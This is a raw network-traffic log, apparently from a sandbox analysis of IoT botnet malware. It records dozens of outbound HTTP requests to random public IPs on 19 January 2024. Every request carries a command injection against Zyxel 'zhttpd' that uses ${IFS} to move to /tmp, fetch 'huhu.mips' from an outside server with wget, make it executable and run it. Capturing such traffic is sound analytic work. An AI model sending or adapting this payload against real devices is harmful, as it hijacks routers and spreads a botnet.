                                      Jan 19, 2024 17:29:49.116419077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8567192.168.2.143821257.232.155.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116466045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8568192.168.2.1439286203.227.249.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116489887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8569192.168.2.145713459.202.32.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116518021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8570192.168.2.1447618218.167.38.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116561890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8571192.168.2.1459048139.98.120.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116614103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8572192.168.2.1439980161.235.47.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116650105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8573192.168.2.14555601.70.168.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116698027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8574192.168.2.143853247.37.34.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116722107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8575192.168.2.144956077.68.55.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116785049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8576192.168.2.1450282190.21.206.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116812944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8577192.168.2.145528812.95.161.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116852999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8578192.168.2.145406290.212.122.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116908073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8579192.168.2.143849649.238.40.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116950989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8580192.168.2.145175861.144.71.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116976023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8581192.168.2.145211277.112.106.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.116992950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8582192.168.2.143901096.195.225.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.117043972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8583192.168.2.1455692130.162.168.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.117101908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8584192.168.2.1459724102.229.236.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.119988918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8585192.168.2.1445912113.144.116.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120059013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8586192.168.2.1433366176.12.172.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120661974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8587192.168.2.1450408192.106.40.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120707989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8588192.168.2.145910438.215.234.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120733023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8589192.168.2.145353069.147.222.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120749950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8590192.168.2.1458380183.148.238.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120795965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8591192.168.2.1455274175.138.2.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120836020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8592192.168.2.1441920195.218.219.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120858908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8593192.168.2.1460232160.81.243.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120896101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8594192.168.2.143306013.191.52.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120908022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8595192.168.2.1435764142.150.38.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120942116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8596192.168.2.1444524149.166.122.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.120995045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8597192.168.2.144804872.162.179.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121021986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8598192.168.2.1452554174.71.203.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121074915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8599192.168.2.1442952144.207.240.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121109962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8600192.168.2.1432972102.180.189.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121155024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8601192.168.2.145745465.31.196.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121185064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8602192.168.2.1456780217.243.145.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121231079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8603192.168.2.1459916171.161.124.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121257067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8604192.168.2.144016247.152.147.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121311903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8605192.168.2.1458974153.52.27.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121321917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8606192.168.2.1459848165.141.241.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121367931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8607192.168.2.143739452.213.254.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.121381998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8608192.168.2.143302044.42.208.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130034924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8609192.168.2.144857478.216.219.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130088091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8610192.168.2.1452296119.160.139.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130132914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8611192.168.2.1450696163.191.127.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130170107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8612192.168.2.145053623.178.104.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130202055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8613192.168.2.1434280167.172.88.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130253077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8614192.168.2.1447102142.152.119.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130285025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8615192.168.2.1459360195.115.162.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130315065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8616192.168.2.143826014.121.47.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130374908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8617192.168.2.143812847.92.54.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130402088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8618192.168.2.1457554181.12.227.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130426884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8619192.168.2.143933844.109.84.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130501986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8620192.168.2.1456864168.66.84.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130528927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8621192.168.2.144411239.37.61.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130557060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8622192.168.2.1440792210.171.179.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130597115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8623192.168.2.1458658146.178.129.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130654097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8624192.168.2.1446026184.6.185.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130698919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8625192.168.2.1460150111.46.45.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130752087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8626192.168.2.143673066.95.55.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130791903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8627192.168.2.1455488168.100.167.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130837917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8628192.168.2.1450404199.42.173.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130860090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8629192.168.2.143681468.235.84.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130884886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8630192.168.2.14598149.35.224.218443
                                      TimestampBytes transferredDirectionData
